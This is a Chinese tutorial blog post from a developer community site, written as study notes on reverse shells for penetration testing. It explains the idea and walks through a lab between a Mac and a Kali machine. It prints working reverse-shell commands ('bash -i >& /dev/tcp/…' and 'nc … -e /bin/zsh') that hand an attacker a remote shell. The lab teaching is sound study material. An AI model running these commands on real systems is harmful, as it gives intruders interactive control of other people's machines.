首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1

【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1

作者头像
wjl110
发布于 2022-04-10 04:45:08
发布于 2022-04-10 04:45:08
2.2K03
代码可运行
举报
运行总次数:3
代码可运行

前言

为何给靶机发送这条执行命令就会自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯)

作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官方的语言,给入门渗透学习的人员提供一个参考1


更容易阅读的版本在这里,点击传送


常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1

何为shell

Shell 脚本(shell script),是一种为 shell 编写的脚本程序。

如何执行

有一个能编写代码的文本编辑器和一个能解释执行的脚本解释器就可以执行

shell种类

linux

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Bourne Shell(/usr/bin/sh或/bin/sh)
Bourne Again Shell(/bin/bash)
C Shell(/usr/bin/csh)
K Shell(/usr/bin/ksh)
Shell for Root(/sbin/sh)..

Mac

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
bash
zsh
..

Windows

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
PowerShell
Cmd
..

bash与sh

bash对sh兼容,是各种Linux发行版标准配置的Shell

何为反弹shell:

:::tip

  • 让靶机主动执行连接我们本地机器的命令
  • 优点:
  • 靶机更换ip后依然不会丢失权限
  • 连接方便、操作简单
  • 相较于传统后门不易被清理等优势; :::

正向shell

可以理解为q1给q2打电话,q2接电话,完成信息接通

反弹shell

可以理解为q1给q2打电话,q2把q1的电话号码保存下来,然后重新呼叫了q1

linux反弹shell

nc(NetCat)

可实现任意TCP/UDP端口的侦听

安装nc(发行版linux默认已安装)

命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
yum install nc -y

使用方法

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nc -lvp 4444 
# -lvp (l监听v输出p端口)

实战

靶机执行:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
bash -i >& /dev/tcp/192.168.0.10/4444 0>&1
# bash -i  启动交互式命令bash 
# -i       将输出重定向到文件
# /dev/tcp 靶机为Linux的设备/dev/tcp连接程序启动socket(Linux系统:所有程序都是目录文件)
# 192.168.0.10/4444 连接的ip和端口(即本地计算机)
# 0>&1     远程的输入和输出(消息呈现方式为远程)

命令

解释

bash -i

启动交互式命令bash

-i

将输出重定向到文件

/dev/tcp

靶机为Linux的设备/dev/tcp连接程序启动socket(Linux系统:所有程序都是目录文件)

192.168.0.10/4444

连接的ip和端口(即本地计算机)

0>&1

远程的输入和输出(消息呈现方式为远程)

实战时注意

:::warning Mac监听端没有nc -lvp port此命令 只有nc -lv port :::

实战中,我拿Mac和kali-linux进行测试

查看Mac和Linux的ip命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
sudo su
ifconfig

kali的ip:10.211.55.4

Mac的ip:10.37.129.2

正向连接- Mac连接kali

1.kali启动监听:(先启动监听,否则拒绝连接)

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
sudo su
nc -lv 7777

Mac执行:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
sudo su
zsh -i > /dev/tcp/mac监听ip/mac监听端口
(ls,pwd,whoami,cd /tmp,)

此时Mac终端执行者已经变为kali的root用户

尝试发送信息(Mac->kali)

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
whoami

kali机:监听端口并且实时回显信息

尝试在kali上执行命令

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
pwd

可以看到Mac上并无信息

因为此时为单方通信,即Mac的信息呈现在kali

反弹shell

shell:Mac->(攻击)kali

Mac开启监听

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nc -lv 7777

kali开启shell

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nc 10.211.55.2(Mac:ip) 7777 -e /bin/zsh(zsh或者bash) 

ps:模拟渗透测试时通过某个途径将shell命令发送到了kali机器并成功执行

此时在Mac(攻击机)上执行命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
whoami

可以看到Mac机成功执行命令,并且反弹回相关信息

再看看kali机

并无任何显示

反弹shell:linux——>(攻击)kali kali开启监听

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nc -lvnp 7777

Mac被攻击,执行了shell命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
bash -i >& /dev/tcp/10.211.55.4(kali)/7777 0>&1

此时kali已经有回显信息了,并且连接成功为bash

在kali上执行命令,成功回显

Mac不能执行主动终结命令,权限属于kali机

以上就是我对反弹shell的理解和感受,欢迎留言 写作耗时约2h@(。・o・)@

  1. https://blog.csdn.net/qq_37092496/article/details/122931617 ↩︎
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022/03/15 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
反弹shell命令学习笔记(命令在Mac里执行,反弹到kali机)sudo su 后连接必反弹
反弹shell命令(命令在Mac里执行,反弹到kali机)sudo su 后连接必反弹 Mac端监听命令没有nc -lvp port 只有 nc -lv (或-lvv) port Mac➡️kali : sudo su zsh -i > /dev/tcp/监听ip/监听端口 (ls,pwd,whoami,cd /tmp,) kali机:监听端口并且实时回显信息 nc -lvnp 监听端口 单方通信nc Mac: nc -lv 7777 kali: nc -v 10.211.55.2(Mac:ip) 7777
wjl110
2022/03/14
1.1K0
反弹SHELL介绍及原理
如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。
大江小浪
2021/02/04
2K0
反弹SHELL介绍及原理
内网隧道搭建总结(一)
该操作在vm虚拟机中完成,提前安装了Windows7、kali linux、Windows server2008。
乌鸦安全
2021/10/26
2.2K0
内网隧道搭建总结(一)
shell反弹原理
原理非常简单,当在以上两种场景时,无法直接连接到webshell时,可以换一种策略。让webshell主动连接自己,而不是自己连接webshell。此时,又会产生两个问题。 一webshell如何自动自我唤醒自动发送连接; 二如何监听webshell发送的连接;
cultureSun
2023/05/18
6060
shiro_550反序列化复现.md
漏洞出现在cookie中的RememberMe字段中,说的简单通俗易懂些,当服务端获取到RememberMe后,会进行如下操作
sugarbeet
2022/09/26
3090
shiro_550反序列化复现.md
内网渗透 | 全网最实用的反弹shell总结
声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
安全小王子
2022/12/11
1.9K0
ATT&CK视角下的红蓝对抗:十四.内网穿透之反弹流量分析与检测方法
这里以反弹shell为案例,讲解检测方法手段,假设在内网后渗透阶段,当攻击者获取到管理权限,为了进一步扩大攻击范围在进行横向渗透时,通常会使用到反弹shell的方法获取主机权限,针对反弹shell这种攻击方法,可以根据反弹shell的特征去识别检测,反弹shell传输的数据是以明文方式进行传输的,很容易使用流量分析检测到,对流量特征进行溯源分析检测其带入的攻击特征,即可复现到过程。
一只特立独行的兔先生
2023/11/11
1.2K0
ATT&CK视角下的红蓝对抗:十四.内网穿透之反弹流量分析与检测方法
Replay_CTF靶机渗透
下载地址:https://www.vulnhub.com/entry/replay-1,278/
Elapse
2020/08/17
6310
使用nc及bash进行反弹shell的简单实践
反弹shell(reverse shell),就是控制端监听在某TCP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。
yuanfan2012
2021/04/22
9.1K0
使用nc及bash进行反弹shell的简单实践
干货 | Linux之渗透测试常用反弹shell方法总结
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
网络安全自修室
2024/03/18
1.4K0
干货 | Linux之渗透测试常用反弹shell方法总结
Linux下几种反弹Shell方法的总结与理解
之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上,下面来介绍分析几种常用的方法。
用户6543014
2019/10/25
2K0
Linux下几种反弹Shell方法的总结与理解
Linux环境反弹shell原理与姿势
我们日常渗透测试过程中的最终目的是获取到目标系统的权限,常见的有通过文件上传、命令执行、反序列化等方式,其中在执行命令执行的时候由于目标系统大多数情况下处于防火墙之后、命令执行的权限不够、端口被占用等情况,那么在这种情况下我们就需要考虑——反弹shell,即攻击者在攻击主机上开启端口监听,随后让目标主机反向连接攻击者的服务器,从而规避防火墙、端口、权限等问题,本篇文章我们主要介绍Linux环境中如何通过命令执行来反弹shell
Al1ex
2025/01/12
1.7K0
Linux环境反弹shell原理与姿势
Linux下反弹Shell方法
kali Linux (内外:192.168.5.139) Centos8 (腾讯云:123.6.44.67)
逍遥子大表哥
2022/04/17
2.5K0
Linux下反弹Shell方法
反弹shell的学习总结 - Part 2
dnscat2(https://github.com/iagox86/dnscat2)是一个DNS隧道,旨在通过DNS协议创建加密的命令和控制(C&C)通道。dnscat2分为两部分:客户端和服务端。dnscat2客户端采用C语言编写,服务器端采用ruby语言编写。后来又有安全研究人员使用PowerShell脚本重写了dnscat2客户端dnscat2-powershell(https://github.com/lukebaggett/dnscat2-powershell)。
安全小王子
2020/07/31
2K0
反弹shell的学习总结 - Part 2
不一样的 "反弹Shell" 系统剖析
前两篇文章讲解了cmd和powershell混淆的各种姿势,原理和防御方式,希望能对大家有启发。
七夜安全博客
2020/06/16
3.5K0
不一样的 "反弹Shell" 系统剖析
渗透测试Vulnhub-DC3
本篇为vulnhub系列DC3啦,距DC2这段时间发生了许许多多的事情,有好有坏,都过来了,这几天多了一个特别的人,是幸运吧哈哈哈。哈哈哈哈哈……开始前说点废话,练习过程中也是参考了许多大师傅们写的文章才完成了,在此记录一下,也非常希望师傅们能指正错误。
TenG
2021/12/07
4260
渗透测试Vulnhub-DC3
从一道题目中学习反弹shell
最近在帮一位大师傅测试招新赛的时候,发现自己对反弹shell是不太了解的,因此在用反弹shell解题过后,来对反弹shell进行相关学习,希望对各位师傅有所帮助。
用户9691112
2023/05/18
7340
从一道题目中学习反弹shell
ATT&CK实战系列-红队评估(七)学习记录
Goby:bash -c 'exec bash -i &>/dev/tcp/192.168.0.133/8065 <&1'
FB客服
2022/11/14
1.4K0
ATT&CK实战系列-红队评估(七)学习记录
攻防|反弹shell方式汇总
注意有些反弹shell的方法或脚本只适用于Linux或者Windows,注意区分相关脚本的编写方式方法。
亿人安全
2024/04/19
1.4K0
攻防|反弹shell方式汇总
ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法
假设在内网环境中发现主机,通过漏洞获取到该主机控制权限,想要进一步对内网环境进行后续利用,这里可以通过反弹shell的方式去进行穿透,本次实验以nc工具为例来演示不同系统的操作,实验拓扑如图1-1所示。
一只特立独行的兔先生
2023/10/31
1.4K1
ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法
相关推荐
反弹shell命令学习笔记(命令在Mac里执行,反弹到kali机)sudo su 后连接必反弹
更多 >
交个朋友
加入架构与运维工作实战群
高并发系统设计 运维自动化实践
加入架构与运维趋势交流群
技术趋势前瞻 架构演进方向
加入腾讯云运维技术交流群
云平台运维技巧 分布式系统排障
换一批
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档